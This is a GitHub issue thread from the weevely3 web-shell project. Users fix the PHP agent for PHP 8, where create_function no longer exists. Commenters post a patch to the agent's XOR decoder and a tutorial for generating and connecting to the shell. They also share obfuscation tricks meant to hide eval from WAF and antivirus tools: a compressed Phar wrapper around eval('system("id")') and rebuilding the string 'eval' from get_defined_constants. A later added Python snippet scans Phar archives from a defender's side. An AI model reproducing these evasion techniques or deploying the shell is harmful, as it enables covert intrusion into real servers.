Comments (11)
To generate an agent that works with PHP 8+:
Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).
Change a line in the agent to swap curly braces to square ones:
...
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
}
}
...
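Review bot: the `+` line fixes only the two offsets in the inner XOR loop, and nothing in the hunk shows whether other `$var{...}` string offsets remain in the file. Brace offsets were deprecated in PHP 7.4 and removed in 8.0, so a single leftover still stops the script at parse time; suggest searching the whole file for the brace form and converting every occurrence in the same change. The bracket form `$t[$i]^$k[$j]` behaves identically on PHP 5 and 7, so no version check is needed.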
from weevely3.
Hello @nickylivardo,
Thanks for your answer! It successfully works!
Below is a step-by-step tutorial:
weevely generate -obfuscator cleartext1_php 123 file.php
nano file.php
...
for($i=0;$i<$l;){
for($j=0;($j<$c&&$i<$l);$j++,$i++)
{
- $o.=$t{$i}^$k{$j};
+ $o.=$t[$i]^$k[$j];
}
}
...
weevely http://localhost/file.php 123
++
Archidote
from weevely3.
@archidote @nickylivardo, thx for the answer.
For future generations:
This problem still exists in
Weevely: 4.0.1
PHP Version: 8.2.2
System: Kali linux
from weevely3.
The obfpost_php.tpl template is pretty easy to fix, as shown above.
But I feel like there is no alternative to the now defunct create_function: the only alternative would be eval, but the purpose of this obfuscator is to hide the eval call to an eventual WAF/AV in the first place, so using this function to start the deobfuscation process seems odd, if not useless.
We cannot call it from a string (i.e. $f = "ev"."al"; $f("...");) because eval is a language construct, not a function.
Does anyone have an idea to save this obfuscator from obsolescence?
Edit: assert could have been a good candidate but it does not evaluate string arguments since 8.0.0, so it's not usable.
Edit 2: it may be possible to use a (compressed) Phar archive to mangle the eval call.
Phar support is enabled by default according to PHP documentation.
It works with allow_url_include = Off.
```php
<?php
$a = new Phar('x.phar');
$a->startBuffering();
$a->addFromString('index.php', "<?php\neval('system(\"id\");');"); // This gets compressed
$a->setStub('<?php
include "phar://".basename(__FILE__)."/index.php";
__HALT_COMPILER();
');
$a->stopBuffering();
$a->compressFiles(Phar::GZ);
```
Result
00000000: 3c3f 7068 700a 696e 636c 7564 6520 2270 <?php.include "p
00000010: 6861 723a 2f2f 222e 6261 7365 6e61 6d65 har://".basename
00000020: 285f 5f46 494c 455f 5f29 2e22 2f69 6e64 (__FILE__)."/ind
00000030: 6578 2e70 6870 223b 0a5f 5f48 414c 545f ex.php";.__HALT_
00000040: 434f 4d50 494c 4552 2829 3b20 3f3e 0d0a COMPILER(); ?>..
00000050: 5400 0000 0200 0000 1100 0010 0100 0000 T...............
00000060: 0000 0000 0000 0900 0000 696e 6465 782e ..........index.
00000070: 7068 701c 0000 002e 4a84 641e 0000 0008 php.....J.d.....
00000080: e929 0db4 1100 0000 0000 0001 0000 0078 .).............x
00000090: 1c00 0000 2e4a 8464 1f00 0000 cc69 d406 .....J.d.....i..
000000a0: b411 0000 0000 0000 b3b1 2fc8 2850 482d ........../.(PH-
000000b0: 4bcc d150 2fae 2c2e 49cd d550 ca4c 51d2 K..P/.,.I..P.LQ.
000000c0: b456 d7b4 0600 dbbc 51ff 84c6 032f 5def .V......Q..../].
000000d0: 3317 03f4 d7e9 e879 9ebd 1a70 ca27 f0d2 3......y...p.'..
000000e0: 96b0 eb5b 0072 0202 e90d 9891 bf8f de1a ...[.r..........
000000f0: dbfa 64d0 14a6 fb5d e8eb dd94 c21f 040f ..d....]........
00000100: 4abf 877e 9303 0000 0047 424d 42 J..~.....GBMB
I created a PR to fix the agent and add a phar obfuscator.
from weevely3.
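A defender's view of the Phar idea in the comment above, as an added example (not code from the thread or from the weevely3 project): a signature pass over the raw file bytes sees only the stub, so a scanner has to walk the phar manifest and inflate each entry before matching. The function names, the pattern list and the sample archive are constructed for illustration, and only gzip-flagged entries are inflated.

```python
import re
import struct
import zlib

# End of the PHP stub; the binary manifest starts right after it.
HALT = re.compile(rb"__HALT_COMPILER\(\);(?:[ \n]\?>)?(?:\r?\n)?")
# Illustrative pattern list (an assumption, not a complete signature set).
SUSPICIOUS = re.compile(rb"\b(eval|assert|system|create_function)\s*\(")
ENT_GZ = 0x1000  # per-entry flag: contents stored as raw deflate


def phar_entries(blob):
    """Yield (name, decoded contents) for each file in a phar-format blob."""
    m = HALT.search(blob)
    if m is None:
        raise ValueError("no __HALT_COMPILER(); terminator, not a phar")
    pos = m.end()
    man_len, count = struct.unpack_from("<II", blob, pos)
    data = pos + 4 + man_len  # file contents follow the manifest
    pos += 14                 # length, file count, API version, global flags
    for _ in range(2):        # skip alias, then archive metadata
        pos += 4 + struct.unpack_from("<I", blob, pos)[0]
    for _ in range(count):
        n = struct.unpack_from("<I", blob, pos)[0]
        name = blob[pos + 4:pos + 4 + n].decode("utf-8", "replace")
        _size, _mtime, csize, _crc, flags, meta = struct.unpack_from("<6I", blob, pos + 4 + n)
        pos += 4 + n + 24 + meta
        raw, data = blob[data:data + csize], data + csize
        yield name, zlib.decompress(raw, -15) if flags & ENT_GZ else raw


def scan(blob):
    """Compare a raw-byte signature pass with a pass over the inflated entries."""
    raw = [h.decode() for h in SUSPICIOUS.findall(blob)]
    inner = [(name, h.decode()) for name, body in phar_entries(blob)
             for h in SUSPICIOUS.findall(body)]
    return {"raw": raw, "inflated": inner}


def build_sample():
    """Constructed, unsigned sample: one gzip entry behind a self-including stub."""
    body = b"<?php\neval('echo 1;');"
    co = zlib.compressobj(9, zlib.DEFLATED, -15)
    packed = co.compress(body) + co.flush()
    entry = struct.pack("<I9s6I", 9, b"index.php", len(body), 0, len(packed),
                        zlib.crc32(body), 0o644 | ENT_GZ, 0)
    manifest = struct.pack("<IHIII", 1, 0x11, 0x1000, 0, 0) + entry
    stub = b'<?php\ninclude "phar://".basename(__FILE__)."/index.php";\n__HALT_COMPILER(); ?>\r\n'
    return stub + struct.pack("<I", len(manifest)) + manifest + packed
```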
I got the same problem only with PHP 8th. So I think there may be several measures applied in the newest PHP version.
from weevely3.
I confirm that PHP 8 removed create_function, breaking the PHP agent.
from weevely3.
Hi there
I tried it on the latest version of Kali and PHP 7.3 but I still have this problem. Fortunately the shell works completely fine; the problem is that this error is so annoying.
Why does this happen exactly?
Is there any quick fix or complete fix for this issue?
from weevely3.
I confirm that PHP 8 removed create_function, breaking the PHP agent.
call_user_func still exists and works generally the same as create_function did
on an unrelated note, the function names in the php agent can be generated dynamically while still somewhat obfuscated by building them with static values returned by php functions such as the array keys for get_defined_constants
example with eval
```php
<?php
// this should return 'eval' on most php versions,
$func = strtolower(array_keys(get_defined_constants())[1]);
print($func[0].$func[6].$func[9].$func[11]);
```
there are enough static values located in the same indexes returned from get_defined_constants across most php versions to extend further with other function names
from weevely3.
The purpose of create_function was to execute in-memory PHP code from a dynamic string without leaving visible eval()s in the code. From a quick glance, it does not seem possible to do the same with call_user_func.
from weevely3.
I got the same error as you all. :/
from weevely3.
To generate an agent that works with PHP 8+:
Run the generate command with the flag -obfuscator cleartext1_php to disable the agent obfuscation (this is the only place that create_function is used).
Change a line in the agent to swap curly braces to square ones:
... for($i=0;$i<$l;){ for($j=0;($j<$c&&$i<$l);$j++,$i++) { - $o.=$t{$i}^$k{$j}; + $o.=$t[$i]^$k[$j]; } } ...
it works, thanks
from weevely3.